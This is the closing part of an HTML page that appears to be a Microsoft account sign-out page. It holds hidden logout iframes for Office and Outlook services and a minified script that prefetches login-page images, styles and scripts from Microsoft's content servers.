<div class="row text-body text-block-body" id="InitiatorRedirectOption" 

style="display: none">&nbsp;</div>
</div>
</div>

<div><iframe src="https://www.office.com/logout?sid=494fe386-9fa1-4fbf-

885f-5038fa243363" style="display: none"></iframe><iframe 

src="https://outlook.office365.com/owa/auth/logoff.aspx?

cmd=logoff&amp;exlive=1&amp;lgtype=1&amp;sid=494fe386-9fa1-4fbf-885f-

5038fa243363" style="display: none"></iframe><iframe 

src="https://webshell.suite.office.com/iframe/TokenFactoryIframe/Logout?

sid=494fe386-9fa1-4fbf-885f-5038fa243363" style="display: 

none"></iframe></div>
<script type="text/javascript">
            $Do.when("doc.ready", function () {



        setTimeout('IframeTimeout()', 5000)

            });
        </script><script type="text/javascript">
//<![CDATA[
(function () {
var $Prefetch=

{"rfPre":true,"delay":5000,"maxHistory":4,"maxAge":43200,"ageRes":1440,"na

me":"clrc","fetch":

[{"path":"https://aadcdn.msftauth.net/ests/2.1/content/images/microsoft_lo

go_7zyesnzhfxur7eprws2m2q2.png","hash":"Tr2k76qQ","rf":true},

{"path":"https://aadcdn.msftauth.net/ests/2.1/content/images/work_account_

gwpgszjrdzmg9t-etotdlg2.png","hash":"/YFntclQ","rf":true},

{"path":"https://aadcdn.msftauth.net/ests/2.1/content/images/personal_acco

unt_d3k1lqya8k5_mmblgg85rq2.png","hash":"onsBJBPz","rf":true},

{"path":"https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged

.v2.login.min_59_uuouser7hrkmvbaz1jw2.css","hash":"/tphFReA","co":true,"rf

":true},

{"path":"https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/jquery.1.

11.min__yok_chwseypwbmuffnnaa2.js","hash":"4FOo2hy7","co":true,"rf":true},

{"path":"https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/aad.login

.min_ynywyfekfmsp3ljup2epra2.js","hash":"UKjxVGGn","co":true,"rf":true}],"

mode":5};
!function(e,t,n){function r(e){x.appendLog&&x.appendLog("Client Prefetch: 

"+e)}function i(){try{for(var e=t.cookie.split(";"),r=0;r<e.length;r++)

{var i=e[r];if(i){var o=i.indexOf("=");if(-1!==o){if(i.substr(0,o).trim()

===n.name){var u=i.substr(o+1);return JSON.parse(c(u))}}}}}catch(e){}

return{}}function o(e,t,n){return e.replace(t,n)}function c(e){return e=o

(e,/%5c/g,"\\"),e=o(e,/%3e/g,">"),e=o(e,/%3d/g,"="),e=o(e,/%3c/g,"<"),e=o

(e,/%3b/g,";"),e=o(e,/%3a/g,":"),e=o(e,/%2c/g,","),e=o(e,/%27/g,"'"),
e=o(e,/%22/g,'"'),e=o(e,/%20/g," "),e=o(e,/%25/g,"%")}function u(e){return 

e=o(e,/%/g,"%25"),e=o(e,/ /g,"%20"),e=o(e,/"/g,"%22"),e=o

(e,/'/g,"%27"),e=o(e,/,/g,"%2c"),e=o(e,/:/g,"%3a"),e=o(e,/;/g,"%3b"),e=o

(e,/</g,"%3c"),e=o(e,/=/g,"%3d"),e=o(e,/>/g,"%3e"),e=o(e,/\\/g,"%5c")}

function f(e){var r=new Date;r.setTime(r.getTime()+C*H),t.cookie=n.name

+"="+u(JSON.stringify(e))+";expires="+r.toUTCString()+";path=/; Secure; 

SameSite=None"}function a(e,t){if(e){if(e.indexOf){return e.indexOf(t)}
for(var n=0;n<e.length;n++){if(e[n]===t){return n}}}return-1}function h

(e,t){return-1!==a(e,t)}function g(e,t){var n=a(e,t);return-1!==n&&

(e.splice(n,1),!0)}function s(e,t){for(var n in e){if(e.hasOwnProperty(n)

&&!t(n,e[n])){break}}}function l(){var e=(new Date).getTime(),t=D*H;return 

P.getTime()>e?Math.round(e/t):Math.round((e-P.getTime())/t)}function d

(e,t){var n=!1;if(t&&t.length>0){n=!0;for(var r=0;r<t.length;r++){delete 

e[t[r]]}}return n}function p(e){var t=l()-C,n=t+2*C,r=null,i=0,o=[]
;return s(e,function(c){return c<t||c>n?o.push(c):(0===e[c].length?o.push

(c):(null===r||c<r)&&(r=c),i++),!0}),null!==r&&i>k&&o.push(r),d(e,o)}

function v(e,t,n){r("Fetched: "+e+" Hash: "+t+" isRefresh: "+n);var o=i

(),c=l(),u=!1,a=!1;if(s(o,function(e,n){return!h(n,t)||(e!==c?g(o[e],t)&&

(a=!0):u=!0,!1)}),!u){var d=o[c]||[];d.push(t),o[c]=d,a=!0}a|=p(o),a&&f

(o),b()}function m(t,n,i,o){var c={"method":"GET"};i&&

(c.mode="cors"),e.fetch(t,c).then(function(e){
200===e.status?v(t,n,o):(r("Unexpected response - "+e.status),b

())}).catch(function(e){r("Failed - "+e),b()})}function T(){if

(e.XMLHttpRequest&&!J){return new XMLHttpRequest}if(e.ActiveXObject){try

{return new ActiveXObject("Msxml2.XMLHTTP")}catch(e){}try{return new 

ActiveXObject("Microsoft.XMLHttp")}catch(e){}}return null}function w

(e,t,n,i,o){r("Fetching - "+t),e.onload=function(){v

(t,n,o)},e.onerror=function(){r("XHR failed!"),b()},e.ontimeout=function

(){r("XHR timed out!"),b()};try{e.open("GET",t),
e.withCredentials=i&&!N,e.send()}catch(r){N?setTimeout(function(){v

(t,n,o)},0):(N=!0,w(e,t,n,!1,o))}}function O(t,n,i,o){if(e.fetch){return 

void m(t,n,i,o)}var c=T();if(null!==c){return void w(c,t,n,i,o)}r("Unable 

to identify a transport option!")}function b(){var e=n.fetch;if

(X<e.length&&e[X]){var t=e[X];O(t.path,t.hash,t.co||!1,t.rf||!1),X++}}

function y(e){if(e){try{var n=t.createElement

("link");n.rel="prefetch",n.href=e,t.head.appendChild(n)}catch(e){}}}

function M(){r("Starting"),b(),b()}function S(){
for(var t=e.$Config||e.ServerData||{},r=n.fetch,i=n.mode||-1,o=-

1,c=0;c<r.length;c++){0!==o&&i>=3&&(o=r[c].rf?1:0),R&&!J&&y(r[c].path||

{})}t.prefetchPltMode=o}if(n&&n.fetch&&0!==n.fetch.length){var x=e.

$Debug||{},X=0,H=6e4,P=new Date(2019),k=n.maxHistory||4,C=n.maxAge||

20160,D=n.ageRes||1440,L=n.delay||5e3,R=n.rfPre||!1,J=void 0!==

(e._phantom||e.callPhantom),N=!1;JSON&&JSON.parse&&

(n.clearCookie=function(){document.cookie=n.name+"=; expires=Thu, 01 Jan 

1970 00:00:01 GMT;"},e.$Do.when("doc.load",function(){
setTimeout(M,L),setTimeout(S,0)}))}}(window,document,$Prefetch);

;
})();
//]]>
</script></div>
</body>
</html>
